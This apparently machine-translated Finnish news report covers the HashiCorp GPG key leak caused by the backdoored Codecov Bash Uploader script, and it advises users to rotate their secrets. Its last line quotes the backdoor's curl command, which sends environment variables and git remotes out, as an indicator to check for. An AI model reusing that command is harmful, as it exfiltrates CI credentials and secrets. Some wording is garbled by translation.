HashiCorp, joka tunnetaan avoimen lähdekoodin työkalujen Vagrant, Packer, Nomad ja Terraform kehittäjistä, ilmoitti yksityisen GPG-avaimen vuotamisesta, jota käytetään luomaan julkaisuja vahvistavia digitaalisia allekirjoituksia. GPG-avaimeen pääsyn saaneet hyökkääjät voivat mahdollisesti tehdä piilotettuja muutoksia HashiCorp-tuotteisiin vahvistamalla ne oikealla digitaalisella allekirjoituksella. Samalla yhtiö totesi, että tarkastuksen aikana ei havaittu merkkejä tällaisten muutosten yrityksistä.
Tällä hetkellä vaarantunut GPG-avain on peruutettu ja sen tilalle on otettu uusi avain. Ongelma koski vain SHA256SUM- ja SHA256SUM.sig-tiedostoja käyttävää vahvistusta, eikä se vaikuttanut releases.hashicorp.com-sivuston kautta toimitettujen Linuxin DEB- ja RPM-pakettien digitaalisten allekirjoitusten luomiseen eikä macOS- ja Windows-julkaisujen vahvistusmekanismeihin (AuthentiCode) .
Vuoto johtui Codecov Bash Uploader (codecov-bash) -komentosarjan käytöstä infrastruktuurissa, joka on suunniteltu lataamaan kattavuusraportteja jatkuvan integroinnin järjestelmistä. Codecov-yritystä vastaan tehdyn hyökkäyksen aikana määritettyyn skriptiin piilotettiin takaovi, jonka kautta salasanat ja salausavaimet lähetettiin hyökkääjien palvelimelle.
Hakkeroidakseen hyökkääjät käyttivät hyväkseen Codecov Docker -kuvan luomisprosessissa tapahtunutta virhettä, mikä antoi heille mahdollisuuden poimia pääsytiedot GCS:ään (Google Cloud Storage), jotka olivat tarpeen tehdäkseen muutoksia Codecov.io-tiedostosta jaettuun Bash Uploader -skriptiin. verkkosivusto. Muutokset tehtiin 31. tammikuuta, ne pysyivät havaitsemattomina kaksi kuukautta ja antoivat hyökkääjille mahdollisuuden poimia asiakkaiden jatkuvaan integrointijärjestelmään tallennettuja tietoja. Lisätyn haitallisen koodin avulla hyökkääjät saattoivat saada tietoja testatusta Git-tietovarastosta ja kaikista ympäristömuuttujista, mukaan lukien jatkuvaan integrointijärjestelmiin lähetetyt tunnukset, salausavaimet ja salasanat sovelluskoodin, tietovarastojen ja palvelujen, kuten Amazon Web Services ja GitHub, pääsyn järjestämiseksi.
Suoran kutsun lisäksi Codecov Bash Uploader -skriptiä käytettiin osana muita lataajia, kuten Codecov-action (Github), Codecov-circleci-orb ja Codecov-bitrise-step, joiden käyttäjiä myös ongelma koskee. Kaikkien codecov-bashin ja siihen liittyvien tuotteiden käyttäjien suositellaan tarkastamaan infrastruktuurinsa sekä vaihtamaan salasanoja ja salausavaimia. Voit tarkistaa takaoven olemassaolon komentosarjassa käyttämällä rivi curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || totta
Lähde: opennet.ru